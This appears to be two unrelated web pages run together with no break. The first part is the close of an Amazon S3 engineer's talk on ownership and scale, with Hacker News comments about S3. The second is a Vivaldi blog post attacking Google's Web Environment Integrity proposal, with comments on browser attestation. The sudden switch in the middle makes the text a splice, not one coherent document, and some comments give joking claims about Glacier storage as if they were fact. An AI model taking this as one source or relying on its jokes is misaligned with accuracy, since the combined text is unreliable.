I've spent a lot of time at Amazon thinking about how important and effective the focus on ownership is to the business, but also about how effective an individual tool it is when I work with engineers and teams. I realized that the idea of recognizing and encouraging ownership had actually been a really effective tool for me in other roles. Here's an example: In my early days as a professor at UBC, I was working with my first set of graduate students and trying to figure out how to choose great research problems for my lab. I vividly remember a conversation I had with a colleague that was also a pretty new professor at another school. When I asked them how they choose research problems with their students, they flipped. They had a surprisingly frustrated reaction. "I can't figure this out at all. I have like 5 projects I want students to do. I've written them up. They hum and haw and pick one up but it never works out. I could do the projects faster myself than I can teach them to do it."
And ultimately, that's actually what this person did — they were amazing, they did a bunch of really cool stuff, and wrote some great papers, and then went and joined a company and did even more cool stuff. But when I talked to grad students that worked with them what I heard was, "I just couldn't get invested in that thing. It wasn't my idea."
As a professor, that was a pivotal moment for me. From that point forward, when I worked with students, I tried really hard to ask questions, and listen, and be excited and enthusiastic. But ultimately, my most successful research projects were never mine. They were my students and I was lucky to be involved. The thing that I don't think I really internalized until much later, working with teams at Amazon, was that one big contribution to those projects being successful was that the students really did own them. Once students really felt like they were working on their own ideas, and that they could personally evolve it and drive it to a new result or insight, it was never difficult to get them to really invest in the work and the thinking to develop and deliver it. They just had to own it.
And this is probably one area of my role at Amazon that I've thought about and tried to develop and be more intentional about than anything else I do. As a really senior engineer in the company, of course I have strong opinions and I absolutely have a technical agenda. But If I interact with engineers by just trying to dispense ideas, it's really hard for any of us to be successful. It's a lot harder to get invested in an idea that you don't own. So, when I work with teams, I've kind of taken the strategy that my best ideas are the ones that other people have instead of me. I consciously spend a lot more time trying to develop problems, and to do a really good job of articulating them, rather than trying to pitch solutions. There are often multiple ways to solve a problem, and picking the right one is letting someone own the solution. And I spend a lot of time being enthusiastic about how those solutions are developing (which is pretty easy) and encouraging folks to figure out how to have urgency and go faster (which is often a little more complex). But it has, very sincerely, been one of the most rewarding parts of my role at Amazon to approach scaling myself as an engineer being measured by making other engineers and teams successful, helping them own problems, and celebrating the wins that they achieve.
I came to Amazon expecting to work on a really big and complex piece of storage software. What I learned was that every aspect of my role was unbelievably bigger than that expectation. I've learned that the technical scale of the system is so enormous, that its workload, structure, and operations are not just bigger, but foundationally different from the smaller systems that I'd worked on in the past. I learned that it wasn't enough to think about the software, that "the system" was also the software's operation as a service, the organization that ran it, and the customer code that worked with it. I learned that the organization itself, as part of the system, had its own scaling challenges and provided just as many problems to solve and opportunities to innovate. And finally, I learned that to really be successful in my own role, I needed to focus on articulating the problems and not the solutions, and to find ways to support strong engineering teams in really owning those solutions.
I'm hardly done figuring any of this stuff out, but I sure feel like I've learned a bunch so far. Thanks for taking the time to listen.
S3 is more than storage. It is a standard. I like how you can get S3 compatible (usually with some small caveats) storage from a few places. I am not sure how open the standards is, and if you have to pay Amazon to say you are 'S3 compatible' but it is pretty cool.
Examples:
iDrive has E2, Digital Ocean has Object Storage, Cloudflare has R2, Vultr has Object Storage, Backblaze has B2
Google's GCS as well, and I haven't used Microsoft, but it'd be weird if they didn't also have an 'S3 compatible' option.
Edit: I looked it up and apparently no, Azure does not have one :-/
> Imagine a hard drive head as a 747 flying over a grassy field at 75 miles per hour. The air gap between the bottom of the plane and the top of the grass is two sheets of paper. Now, if we measure bits on the disk as blades of grass, the track width would be 4.6 blades of grass wide and the bit length would be one blade of grass. As the plane flew over the grass it would count blades of grass and only miss one blade for every 25 thousand times the plane circled the Earth.
The standing joke is that Americans love strange units of measure but this is one is so outre that it deserves an award.
> Now, let's go back to that first hard drive, the IBM RAMAC from 1956. Here are some specs on that thing:
> Storage Capacity: 3.75 MB
> Cost: ~$9,200/terabyte
Those specs can't possibly be correct. If you multiply the cost by the storage, the cost of the drive works out to 3¢.
This site[1] states,
> It stored about 2,000 bits of data per square inch and had a purchase price of about $10,000 per megabyte
So perhaps the specs should read $9,200 / megabyte? (Which would put the drive's cost at $34,500, which seems more plausible.)
[1]: https://www.historyofinformation.com/detail.php?entryid=952
https://en.m.wikipedia.org/wiki/IBM_305_RAMAC has the likely source of the error: 30M bits (using the 6 data bits but not parity), but it rented for $3k per month so you didn't have a set cost the same as buying a physical drive outright - very close to S3's model, though.
Must've put a decimal point in the wrong place or something. I always do that. I always mess up some mundane detail.
Working in genomics, I've dealt with lots of petabyte data stores over the past decade. Having used AWS S3, GCP GCS, and a raft of storage systems for collocated hardware (Ceph, Gluster, and an HP system whose name I have blocked from my memory), I have no small amount of appreciation for the effort that goes into operating these sorts of systems.
And the benefits of sharing disk IOPs with untold numbers of other customers is hard to understate. I hadn't heard the term 'heat' as it's used in the article but it's incredibly hard to mitigate on single system. For our co-located hardware clusters, we would have to customize the batch systems to treat IO as an allocatable resource the same as RAM or CPU in order to manage it correctly across large jobs. S3 and GCP are super expensive, but the performance can be worth it.
This sort of article is some of the best of HN, IMHO.
As someone in this area: we very much want to make your EiB of data to feel local. It's hard and I'm sorry we only have 3.5 9's of read availability.
Some of the best HN indeed. Would love to see any links to HN posts that you think are similarly good!
It also explains some of the cost model for cloud storage. The best possible customer, from a cloud storage perspective, stores a whole lot of data but reads almost none of it. That's kind of like renting hard drives, except if you only fill some of each hard drive with the 'cold' data, you can still use the hard drive's full I/O capacity to handle the hot work. So, if you very carefully balance what sort of data is on which drive, you can keep all of the drives in use despite most of your data not being used. That's part of why storage is comparatively cheap but reads are comparatively expensive.
Unfortunately many tools in genomics (and biotech in general) still depend on local filesystems- and even if they do support S3, performance is far slower than it could be.
> What's interesting here, when you look at the highest-level block diagram of S3's technical design, is the fact that AWS tends to ship its org chart. This is a phrase that's often used in a pretty disparaging way, but in this case it's absolutely fascinating.
I'd go even further: at this scale, it is essential and required to develop these kind of projects with any sort of velocity.
Large organizations ship their communication structure by design. The alternative is engineering anarchy.
This is also why reorgs tend to be pretty common at large tech orgs.
They know they'll almost inevitably ship their org chart. And they'll encounter tons of process-based friction if they don't.
The solution: Change your org chart to match what you want to ship
Straight from The Mythical Man Month: Organizations which design systems are constrained to produce systems which are copies of the communication structures of these organizations.
I'll take the metaphor one step further. The architecture will, over time, inevitably change to resemble its org chart, therefore it is the job of a sufficiently senior technical lead to organize the teams in such a way that the correct architecture emerges.
How does S3 handle particularly hot objects? Is there some form of rebalancing to account for access rates?
I was disappointed too, this article was very light on details about the subject matter. I wasn't expecting a blue-print, but what was presented was all very hand-wavy.
In large systems (albeit smaller than S3) the way this works is that you slurp out some performance metrics from storage system to identify your hot spots and then feed that into a service that actively moves stuff around (below the namespace of the filesystem though, will be fs-dependant). You have some higher-performance disk pools at your disposal, and obviously that would be nvme storage today.
So in practice, it's likely proprietary vendor code chewing through performance data out of a proprietary storage controller and telling a worker job on a mounted filesystem client to move the hot data to the high performance disk pool. Always constantly rebalancing and moving data back out of the fast pool once it cools off. Obviously for S3 this is happening at an object level though using their own in-house code.
'As a really senior engineer in the company, of course I have strong opinions and I absolutely have a technical agenda. But If I interact with engineers by just trying to dispense ideas, it's really hard for any of us to be successful. It's a lot harder to get invested in an idea that you don't own. So, when I work with teams, I've kind of taken the strategy that my best ideas are the ones that other people have instead of me. I consciously spend a lot more time trying to develop problems, and to do a really good job of articulating them, rather than trying to pitch solutions. There are often multiple ways to solve a problem, and picking the right one is letting someone own the solution.'
'I learned that to really be successful in my own role, I needed to focus on articulating the problems and not the solutions, and to find ways to support strong engineering teams in really owning those solutions.'
I love this. Reminds me of the Ikea effect to an extent. Based on this, to get someone to be enthusiastic about what they do, you have to encourage ownership. And a great way is to have it be 'their idea'.
I don't mean this to be cynical, but I do think that it's worth acknowledging that describing the problem is also, in itself, a tool to guide people towards a solution they want. After all, people often disagree about what 'the problem' even is!
Fortunately not every problem is like this. But if you look at, say, discussions around Python's 'packaging problem' (and find people in fact describing like 6 different problems in very different ways), you can see this play out pretty nastily.
There's a saying that I'm often told, and I'm sure we've all heard it at some point 'don't bring me problems, bring me solutions'. It's such a shit comment to make.
I interpret it as if they are saying 'You plebe! I don't have time for your issues. I can't get promoted from your work if you only bring problems.'
Being able to solve the problem is being able to understand the problem and admit it exists first. <smacksMyDamnHead>
this only works if your team are made up of smart competent people.
I strongly agree with this perspective but I wish it could be generalized into techniques that work in everyday life, where there isn't already this established ranking of expertise that focuses attention on what is being said and not whether you have the clout or the authority to say it.
Because absent preestablied perceived authority or expertise, which is the context that most day to day problems surface within, holding forth and hogging the entire two-way discussion channel with your long detailed and carefully articulated description of the problem is going to make you sound like someone who wants to do all the talking and none of the work, or the kind of person who doesn't want to share in finding a solution together with others.
That section really stood out to be as well.
If Andy Warfield is reading, and I bet he is, I have a question. When developing a problem how valuable is it to sketch possible solutions? If you articulate the problem that probably springs to mind a few possible solutions. Is it worth sharing those possible solutions to help kickstart the gears for potential owners? Or is it better to focus only on the problem and let the solution space be fully green?
Additionally, anyone have further reading for this type of "very senior IC" operation?
The things we could build if S3 specified a simple OAuth2-based protocol for delegating read/write access. The world needs an HTTP-based protocol for apps to access data on the user's behalf. Google Drive is the closest to this but it only has a single provider and other issues[0]. I'm sad remoteStorage never caught on. I really hope Solid does well but it feels too complex to me. My own take on the problem is https://gemdrive.io/, but it's mostly on hold while I'm focused on other parts of the self-hosting stack.
Apache Iceberg is kind of this, but more oriented around large data lake datasets.
Most apps, however, assume POSIX-like data access. I would love to see a client-side minimally dependent library that mounts a local directory that is actually the user's S3 bucket.
You can get close with a Cognito Identity Pool that exchanges your user's keys for AWS credentials associated with an IAM role that has access to the resources you want to read/write on their behalf. Pretty standard pattern.
https://docs.aws.amazon.com/cognito/latest/developerguide/co...
edit: I think I misread your comment. I understood it as your app wanting to delegate access to a user's data to the client, but it seems like you want the user to delegate access to their own data to your app? Different use-cases.
Such a system would be amazing. It would really force companies whose products are UIs on top of S3 to compete hard because adversarial interoperability would be an ever present threat from your competitors.
It really is such a shame that all the projects that tried/are trying to create data sovereignty for users became weird crypto.
Absolutely this. I would LOVE to be able to build apps that store people's data in their own S3 bucket, billed to their own account.
Doing that right now is monumentally difficult. I built an entire CLI app just for solving the 'issue AWS credentials that can only access this specific bucket' problem, but I really don't want to have to talk my users through installing and running something like that: https://s3-credentials.readthedocs.io/en/stable/
Great to see Amazon employees being allowed to talk openly about how S3 works behind the scenes. I would love to hear more about how Glacier works. As far as I know, they have never revealed what the underlying storage medium is, leading to a lot of wild speculation (tape? offline HDDs? custom HDDs?).
It's just low powered hard drives that aren't turned on all the time. Nothing special.
HSM is a neat technology, and lots of ways it has been implemented over the years. But it starts with a shim to insert some other technology into the middle a typical posix filesystem. It has to tolerate the time penalty for data recovery of your favored HSM'd medium, but that's kind of the point. You can do it with a lower tier disk, tape, wax cylinder, etc. There's no reason it wouldn't be tape though, tape capacity has kept up and HPSS continues to be developed. The traditional tape library vendors still pump out robotic tape libraries.
I remember installing 20+ fully configured IBM 3494 tape libraries for AT&T in the mid-2000's. These things were 20+ frames long with dual accessors (robots) in each. The robots were able to push a dead accessor out of the way into a 'garage' and continue working in the event one of them died (and this actually worked). Someone will have to invent a cheaper medium of storage than tape before tape will ever die.
Are there any public details on how Azure or GCP do archival storage?
Glacier is a big 'keep your lips sealed' one. I'd love AWS to talk about everything there, and the entire journey it was on because it is truly fascinating.
Amazon engineer here - can confirm that Glacier transcodes all data on to the backs of the shells of the turtles that hold up the universe. Infinite storage medium, if a bit slow.
Never officially stated, but frequent leaks from insiders confirm that Glacier is based on Very Large Arrays of Wax Phonograph Records (VLAWPR) technology.
It's honestly super impressive that it's never leaked. All it takes is one engineer getting drunk and spouting off. In much higher stakes, a soldier in Massachusetts is about to go to jail for a long time for leaking national security intel on Discord to look cool to his gamer buddies. I would have expected details on Glacier to come out by now.
Glacier was originally using actual glaciers as a storage media since they have been around forever. Bu then climate change happened so they quickly shifted to tiered storage of tape and hard drives.
Blueray disks are thought to be the key: https://storagemojo.com/2014/04/25/amazons-glacier-secret-bd...
Some people disagree though. It's still an unknown.
I don't expect high salary engineers leak it, but random contractor at datacenter or supplier would eventually leak if they use special storage device other than HDD/SSD. Since we don't see any leaks, I suspect that it's based on HDD, with very long IO waitlist.
Just look at other clouds. I doubt amazon is doing anything special. At least they don't reflect any special pricing.
> That's a bit error rate of 1 in 10^15 requests. In the real world, we see that blade of grass get missed pretty frequently – and it's actually something we need to account for in S3.
One of the things I remember from my time at AWS was conversations about how 1 in a billion events end up being a daily occurrence when you're operating at S3 scale. Things that you'd normally mark off as so wildly improbable it's not worth worrying about, have to be considered, and handled.
Glad to read about ShardStore, and especially the formal verification, property based testing etc. The previous generation of services were notoriously buggy, a very good example of the usual perils of organic growth (but at least really well designed such that they'd fail 'safe', ensuring no data loss, something S3 engineers obsessed about).
Personally I'd love working in that kind of environment. That one in a billion hole still itches at me. There's also a slightly-perverse little voice in my head ready with popcorn in case I'm lucky enough to watch the ensuing fallout from the first major crypto hash collision :-).
Was an SDM of a team of brand new SDEs standing up a new service. In a code review, pointed to an issue that could cause a Sev2, and the SDE pushed back 'that's like one in a million chance, at most'. Pointed out once we were dialled up to 500k TPS (which is where we needed to be at), that was 30 times a minute... 'You want to be on call that week?'. Insist on Highest Standards takes on a different meaning in that stack compared to most orgs.
James Hamilton, AWS' chief architect, wrote about this phenomena in 2017: At scale, rare events aren't rare; https://news.ycombinator.com/item?id=14038044
I think Ceph hit similar problems and they had to add more robust checksumming to the system, as relying on just tcp checksums for integrity for example was no longer enough
> daily occurrence when you're operating at S3 scale
Yeah! With S3 averaging over 100M requests per second, 1 in a billion happens every ten seconds. And it's not just S3. For example, for Prime Day 2022, DynamoDB peaked at over 105M requests per second (just for the Amazon workload): https://aws.amazon.com/blogs/aws/amazon-prime-day-2022-aws-f...
In the post, Andy also talks about Lightweight Formal Methods and the team's adoption of Rust. When even extremely low probability events are common, we need to invest in multiple layers of tooling and process around correctness.
Also worked at Amazon, saw some issues with major well known open source libraries that broke in places nobody would ever expect.
To think that when Andy's Coho Data built their first prototype on top of my abandoned Lithium [1] code base from VMware, the first thing they did was remove "all the crazy checksumming code" to not slow things down...
Daily? A component I worked on that supported S3's Index could hit a 1 in a billion issue multiple times a minute. Thankfully we had good algorithms and hardware that is a lot more reliable these days!
What most people don't realize is that the magic isn't in handling the system itself; the magic is making authorization appear to be zero-cost.
In distributed systems authorization is incredibly difficult. At the scale of AWS it might as well be magic. AWS has a rich permissions model with changes to authorization bubbling through the infrastructure at sub-millisecond speed - while handling probably trillions of requests.
This and logging/accounting for billing are the two magic pieces of AWS that I'd love to see an article about.
Note that S3 does AA differently than other services, because the permissions are on the resource. I suspect that's for speed?
Keep in mind that S3 predates IAM by several years. So part of the reason that access to buckets/keys is special is because it was already in place by the time IAM came around.
Its likely persisted since than largely since removing the old model would be a difficult taks without potentially breaking a lot of customer's setup
S3 is a truly amazing piece of technology. It offers peace of mind (well, almost), zero operations, and practically unlimited bandwidth for at least analytics workload. Indeed, it's so good that there has not been much progress in building an open-source alternative to S3. There seems not much activity in the Hadoop community. I have yet heard any company who uses RADOS on Ceph to handle PBs of data for analytics workload. MinIO made its name recently, but its license is restrictive and its community is quite small compared to that of Hadoop of its hay days.
There was a time when S3 was getting resilient. Today it is excellent. Pepridge Farms remembers.
> There seems not much activity in the Hadoop community
There is apache ozone https://ozone.apache.org/
754 points 6 days ago by dagurp in 2876th position
vivaldi.com | Estimated reading time – 7 minutes | comments | anchor
Read this article in 日本語.
Google seems to love creating specifications that are terrible for the open web and it feels like they find a way to create a new one every few months. This time, we have come across some controversy caused by a new Web Environment Integrity spec that Google seems to be working on.
At this time, I could not find any official message from Google about this spec, so it is possible that it is just the work of some misguided engineer at the company that has no backing from higher up, but it seems to be work that has gone on for more than a year, and the resulting spec is so toxic to the open Web that at this point, Google needs to at least give some explanation as to how it could go so far.
The spec in question, which is described at https://github.com/RupertBenWiser/Web-Environment-Integrity/blob/main/explainer.md, is called Web Environment Integrity. The idea of it is as simple as it is dangerous. It would provide websites with an API telling them whether the browser and the platform it is running on that is currently in use is trusted by an authoritative third party (called an attester). The details are nebulous, but the goal seems to be to prevent "fake" interactions with websites of all kinds. While this seems like a noble motivation, and the use cases listed seem very reasonable, the solution proposed is absolutely terrible and has already been equated with DRM for websites, with all that it implies.
It is also interesting to note that the first use case listed is about ensuring that interactions with ads are genuine. While this is not problematic on the surface, it certainly hints at the idea that Google is willing to use any means of bolstering its advertising platform, regardless of the potential harm to the users of the web.
Despite the text mentioning the incredible risk of excluding vendors (read, other browsers), it only makes a lukewarm attempt at addressing the issue and ends up without any real solution.
Simply, if an entity has the power of deciding which browsers are trusted and which are not, there is no guarantee that they will trust any given browser. Any new browser would by default not be trusted until they have somehow demonstrated that they are trustworthy, to the discretion of the attesters. Also, anyone stuck running on legacy software where this spec is not supported would eventually be excluded from the web.
To make matters worse, the primary example given of an attester is Google Play on Android. This means Google decides which browser is trustworthy on its own platform. I do not see how they can be expected to be impartial.
On Windows, they would probably defer to Microsoft via the Windows Store, and on Mac, they would defer to Apple. So, we can expect that at least Edge and Safari are going to be trusted. Any other browser will be left to the good graces of those three companies.
Of course, you can note one glaring omission in the previous paragraph. What of Linux? Well, that is the big question. Will Linux be completely excluded from browsing the web? Or will Canonical become the decider by virtue of controlling the snaps package repositories? Who knows. But it's not looking good for Linux.
This alone would be bad enough, but it gets worse. The spec hints heavily that one aim is to ensure that real people are interacting with the website. It does not clarify in any way how it aims to do that, so we are left with some big questions about how it will achieve this.
Will behavioral data be used to see if the user behaves in a human-like fashion? Will this data be presented to the attesters? Will accessibility tools that rely on automating input to the browser cause it to become untrusted? Will it affect extensions? The spec does currently specify a carveout for browser modifications and extensions, but those can make automating interactions with a website trivial. So, either the spec is useless or restrictions will eventually be applied there too. It would otherwise be trivial for an attacker to bypass the whole thing.
Unfortunately, it's not that simple this time. Any browser choosing not to implement this would not be trusted and any website choosing to use this API could therefore reject users from those browsers. Google also has ways to drive adoptions by websites themselves.
First, they can easily make all their properties depend on using these features, and not being able to use Google websites is a death sentence for most browsers already.
Furthermore, they could try to mandate that sites that use Google Ads use this API as well, which makes sense since the first goal is to prevent fake ad clicks. That would quickly ensure that any browser not supporting the API would be doomed.
There is an overwhelming likelihood that EU law will not allow a few companies to have a huge amount of power in deciding which browsers are allowed and which are not. There is no doubt that attesters would be under a huge amount of pressure to be as fair as possible.
Unfortunately, legislative and judicial machineries tend to be slow and there is no saying how much damage will be done while governments and judges are examining this. If this is allowed to move forward, it will be a hard time for the open web and might affect smaller vendors significantly.
It has been long known that Google's dominance of the web browser market gives them the potential to become an existential threat to the web. With every bad idea they have brought to the table, like FLOC, TOPIC, and Client Hints, they have come closer to realizing that potential.
Web Environment Integrity is more of the same but also a step above the rest in the threat it represents, especially since it could be used to encourage Microsoft and Apple to cooperate with Google to restrict competition both in the browser space and the operating system space. It is imperative that they be called out on this and prevented from moving forward.
While our vigilance allows us to notice and push back against all these attempts to undermine the web, the only long-term solution is to get Google to be on an even playing field. Legislation helps there, but so does reducing their market share.
Similarly, our voice grows in strength for every Vivaldi user, allowing us to be more effective in these discussions. We hope that users of the web realize this and choose their browsers consequently.
The fight for the web to remain open is going to be a long one and there is much at stake. Let us fight together.
Why use quotes for 'dangerous' when the first sentence is literally: 'Why Vivaldi browser thinks Google's new proposal, the Web-Environment-Integrity spec, is a major threat to the open web and should be pushed back.'
As usual, a thousand word essay on Google's WEI without ever mentioning that Apple sailed that ship silently a while ago, therefore not attracting any attention or backlash.
https://httptoolkit.com/blog/apple-private-access-tokens-att...
https://toot.cafe/@pimterry/110775130465014555
The sorry state of tech news / blogs. Regurgitating the same drama without ever looking at the greater picture.
I didn't notice it because I, just like a majority of internet users worldwide, do not own any Apple products and therefore I was never affected and probably never will be.
I do, however, routinely interact with websites that implement Google Analytics and/or Google ads. If those sites start rejecting my browser of choice I will most certainly be locked out of a significant portion of the internet. And the remaining 60% of all internet users would be essentially forced to accept this technology or else. That's an order of magnitude or two more users, and seems to me like a good reason to raise the alarm.
> As usual, a thousand word essay on Google's WEI without ever mentioning that Apple sailed that ship silently
The 'look! there's a bigger asshole over there' defense.
Never a winning strategy.
Personally I don't think PATs are nearly as bad as WEI. PATs just bypass CAPTCHAs while WEI will presumably lock people out of sites completely.
The post states it. This is not a problem because Safari is not the leading web browser. Apple has very limited power over what they can do with it.
Very controversial take but I think this benefits the vast majority of users by allowing them to bypass captchas. I'm assuming that people would use this API to avoid showing real users captchas, not completely prevent them from browsing the web.
Unfortunately people who have rooted phones, who use nonstandard browsers are not more than 1% of users. It's important that they exist, but the web is a massive platform. We can not let a tyranny of 1% of users steer the ship. The vast majority of users would benefit from this, if it really works.
However i could see that this tool would be abused by certain websites and prevent users from logging in if on a non standard browser, especially banks. Unfortunate but overall beneficial to the masses.
Edit: Apparently 5% of the time it intentionally omits the result so it can't be used to block clients. Very reasonable solution.
There are obvious benefits here. The ability to remove captchas is one, the ability to ensure that clients are running the latest updates before accessing sensitive content, etc.
But the power is too significant. If it were some small subset of positive assertions I'd be ok with this, but the ability to perform arbitrary attestation is beyond what is required and is far too abusable.
> I think this benefits the vast majority of users by allowing them to bypass captchas.
I don't think it does that. Nothing about this reduces the problem that captchas are attempting to solve.
> i could see that this tool would be abused by certain websites and prevent users from logging in if on a non standard browser, especially banks.
That's not abusing this tool. That's the very thing that this is intended to allow.
how often do normal users see CAPTCHAs these days? I seldom see one anymore.
Most captchas these days are already only there to enforce Google's monopoly. If you use and 'approved' browser and let them track you, you don't get one, browse anonymously and you can't get past. That ship has already sailed and it's already evil, anticompetitive behavior.
> Unfortunately people who have rooted phones, who use nonstandard browsers are not more than 1% of users
Depends on what you count as 'nonstandard', but various estimates put non-top 6 browser usage at between 3-12% (https://en.wikipedia.org/wiki/Usage_share_of_web_browsers#Su...) and non-Windows/macOS/iOS/Android usage at ~4% (https://en.wikipedia.org/wiki/Usage_share_of_operating_syste....) These also don't take into account traffic on older operating systems or hardware that would be incompatible with these attestations, or clients that spoof their user agent for anonymity.
In an ideal world, we would see this number grow, not shrink. It's not good for consumers if our choices dwindle to just one or two options.
> We can not let a tyranny of 1% of users steer the ship.
Far less than 1% of my users use the accessibility features. In fact, it is closer to 1% of 1%. Does that justify the far, far easier development and bug testing that I would enjoy if I were to stop providing accessibility features?
> We can not let a tyranny of 1% of users steer the ship.
Normally I'd agree with you on that the tyranny of the minority is a bad thing, but sometimes the minority actually has a point and this is one of the cases where the minority is _objectively_ correct and letting the majority decide would end up in a complete dystopia. Democracy only works if everyone is informed (and able to think logically/critically, not influenced (either by force or by salary), etc.) and in this case the 99% simply do not have any clue on the effects of this being implemented (nor do they care). This entire proposal is pure orwellian shit.
WEI acts as proof that 'this is a browser', not 'this is a human'. But browsers can be automated with tools like Selenium. I'd guess that with the advent of complicated, JS-based captchas, browsers under automation are already the major battleground between serious scrapers and anti-bot tools.
I also don't understand how WEI does much to prevent a motivated user from faking requests. If you have Chrome running on your machine it's not gonna be too hard to extract a signed WEI token from its execution, one way or another, and pass that along with your Python script.
It looks like it basically gives Google another tool to constrain users' choices.
That is not controversial at all, but rather a plain fact about the short term incentives! If adoption of this technology weren't an attractor, then we'd have nothing to worry about. But the problem is the functionality of this spec, supported by the fundamental backdoor of corporate TPMs, is set up to facilitate power dynamics that inevitably result in full corporate control over everyone's computing environment.
I think these are the related threads to date—have I missed any?
Google is already pushing WEI into Chromium - https://news.ycombinator.com/item?id=36876301 - July 2023 (705 comments)
Google engineers want to make ad-blocking (near) impossible - https://news.ycombinator.com/item?id=36875226 - July 2023 (439 comments)
Google vs. the Open Web - https://news.ycombinator.com/item?id=36875164 - July 2023 (161 comments)
Apple already shipped attestation on the web, and we barely noticed - https://news.ycombinator.com/item?id=36862494 - July 2023 (413 comments)
Google's nightmare "Web Integrity API" wants a DRM gatekeeper for the web - https://news.ycombinator.com/item?id=36854114 - July 2023 (447 comments)
Web Environment Integrity API Proposal - https://news.ycombinator.com/item?id=36817305 - July 2023 (437 comments)
Web Environment Integrity Explainer - https://news.ycombinator.com/item?id=36785516 - July 2023 (44 comments)
Google Chrome Proposal – Web Environment Integrity - https://news.ycombinator.com/item?id=36778999 - July 2023 (93 comments)
Web Environment Integrity – Google locking down on browsers - https://news.ycombinator.com/item?id=35864471 - May 2023 (1 comment)
Add one more related:
Apple already shipped attestation on the web, and we barely noticed https://news.ycombinator.com/item?id=36862494
I had one but it got flagged, ah well:
- "I don't know why this enrages folks so much." Googler re Chrome anti-feature https://news.ycombinator.com/item?id=36868888
I think that just meant some users with sufficient karma flagged it, but I was a bit confused because for a while it didn't say '[flagged]' but didn't show up in the first several pages or continue to get upvotes. Is there a delay in saying '[flagged]'?
What unclear to me is how the actual verification by this attester would happen. Somehow the attester, which is also a remote service, verifies your device? Are there any details on how that would happen specifically?
Basically, you build up a set of cryptographically verified computing primitived (like secure enclave) that are enforced by a hardware component with baked in from the manufacturer keys. Basically it's setting up an 'owned by vendor computing channel' and baking it into the Silicon.
You won't get the chance to refuse this feature. There'll be too much money at stake for manufacturers to not retool for it. It'll be the only thing they make to sell, so take it or leave it chump.
> Any browser choosing not to implement this would not be trusted and any website choosing to use this API could therefore reject users from those browsers.
If we are serious about protesting this, let's do as follows: We implement code in our websites that checks whether the user agent implements this API. If the check passes, we tell the user that their browser is not welcome and why that is.
#BoycottGoogle #BoycottChrome #BoycottBullshit
> let's do as follows: We implement code in our websites that checks whether the user agent implements this API. If the check passes, we tell the user that their browser is not welcome and why that is.
I am sympathetic, I agree let's all do that....
...I cannot imagine any of the money people I work with agreeing
Tell that to your boss.
Also if google wants to, I'm sure they can obscure it
Would it be possible for someone using a zero day vulnerability to develop a botnet that will infect enough computers on the web, and their payload would be some way to modify browsers in a way to render them untrusted to WEI, and effectivelly render anybody infected out of the web? Would it be a new way to DDOS users out of the 'trusted' web?
I asked a similar question:
Can someone send attlestation requests from the range of residential ips with such frequency that the attlestation sequence is forced to captcha users, thus defeating it? You don't need the token response back from an attlestation, so you could spoof your ip and not worry about getting a response.
[flagged]
>It will actually be very positive for the web overall and you'll see the benefits soon enough.
What might those benefits be? Not being snarky here, but AFAICT the only folks who gain any benefit seem to be Google and their customers (advertisers).
What am I missing here?
As noted in the article, Google comes up with a scheme like this every couple months. They also can't seem to identify good sites anymore, based on their search results.
So... fuck it. Let them DRM their part of the internet. It is mostly shit nowadays anyway. They can index Reddit, X, and a bunch of sites that are GPT SEO trash.
We're never getting 201X internet back anyway, so let Google and friends do their thing and everybody who doesn't want anything to do with it can go back to the 200X internet. It was kind of disorganized but it it better than fighting them on DRM over an over again.
We now need two things. First, an antitrust breakup of Google, separating search and ads. Second, a tax on ads.
It must be made against the economic interests of search engines to show too many ads.
I agree with the first. The second I think is missing the target. This really doesn't have anything to do with search. Instead this is Google (The largest ad seller) using it's market position (as the maker of Chrome/Chromium, the most popular browser) to prevent users from not seeing its ads on any website where they're displayed.
While I believe that the idea of splitting Search and Ads could be a game changer, how would Search become profitable without Ads, and without compromising the rank algorithm?
It's never going to be against the economic interest of search engines to show ads, they can sell spots on their front page which are always going to be valuable.
This should be against their tactical interests, because it hurts their accuracy driving away users, but absent a significantly more accurate competitor they'll get away with it for a long time.
Regarding Google search there are some hopeful signs. For one some people report Google's accuracy dropping, and Google keeps switching up its idiosyncrasies to avoid spam but in doing so they devalue the effort people put into SEO and into refining their Google-fu. These might be the same thing however.
Could this be the end of my Youtube addiction arc?
Well, it's making me finally kick my Chrome habit. My work machine runs Firefox and it's fine, but my personal stuff is all on Chrome because it's also my password management, etc. etc.
I tried once before, when I quit working at Google and was trying to de-Google a bunch, and I never succeeded.
I plan to move everything over over the next few days. Wish me luck!
Next up: getting my photos out of Google Photos.
Well... I stopped watching Twitch after ublock stop blocking its ads, so maybe...
This is especially rich coming from google's, who's 'safetynet' for android results in a significant reduction in security (contrary to its stated purpose): it locks out 3rd-party up-to-date and secure ROMs while allowing horrificly insecure manufacturer-provided ROMs to still pass, because to disable those would cause a massive user outcry. So it functions as a vendor lock-in but no meaningful increase in security for the average user, while preventing more advanced users from improving their security without needing to buy more hardware. This needs to be called out more to push back against the claim that this kind of attestation somehow has a legitimate benefit for the users.
'The term cognitive distortions has often been used as a general umbrella term to refer to pseudo-justifications and rationalizations for their deviant behavior, and pro-criminal or offense-supporting attitudes (Maruna & Copes, 2004; Maruna & Mann, 2006; Ciardha & Gannon, 2011).' Helmond et al., Criminal Justice and Behavior, 2015, Vol. 42, No. 3, March 2015, 245-262
It seems that almost any software/website can be framed as having a legitimate benefit for users, e.g., increased convenience and/or security.^1 The more pertinent inquiry is what benefit(s) does it have for its author(s). What does it do (as opposed to 'what is it'). Let the user draw their own conclusions from the facts.
1. Arguably it could be a distortion to claim these are not mutually exclusive.
We can use web clients that do not leak excessive data that might be collected and used for advertising and tracking by so-called 'tech' companies. Google would prefer that we not use such clients. But why not. A so-called 'tech' company might frame all non-approved web clients as 'bots' and all web usage without disclosing excessive data about the computer user's setup^2 as relating to 'fraud'. It might frame all web usage as commercial in nature and thus all websites as receptacles for advertising. This 'all or nothing' thinking is a classic cognitive distortion.
2. This was the norm in the eary days of the web.
And speaking of user-hostile, locked-down phones...
a galactic irony that Ben Wiser, the Googler who posted this proposal, has a blog where his most recent post is a rant about how he's being unfairly restricted and can't freely run the software he wants on his own device.
https://benwiser.com/blog/I-just-spent-%C2%A3700-to-have-my-...
This is especially rich coming from google's, who's 'safetynet' for android results in a significant reduction in security (contrary to its stated purpose): it locks out 3rd-party up-to-date and secure ROMs while allowing horrificly insecure manufacturer-provided ROMs to still pass, because to disable those would cause a massive user outcry.
That's not the case with GrapheneOS:
https://grapheneos.org/articles/attestation-compatibility-gu...
SafetyNet is deprecated anyway:
https://developer.android.com/training/safetynet/deprecation...
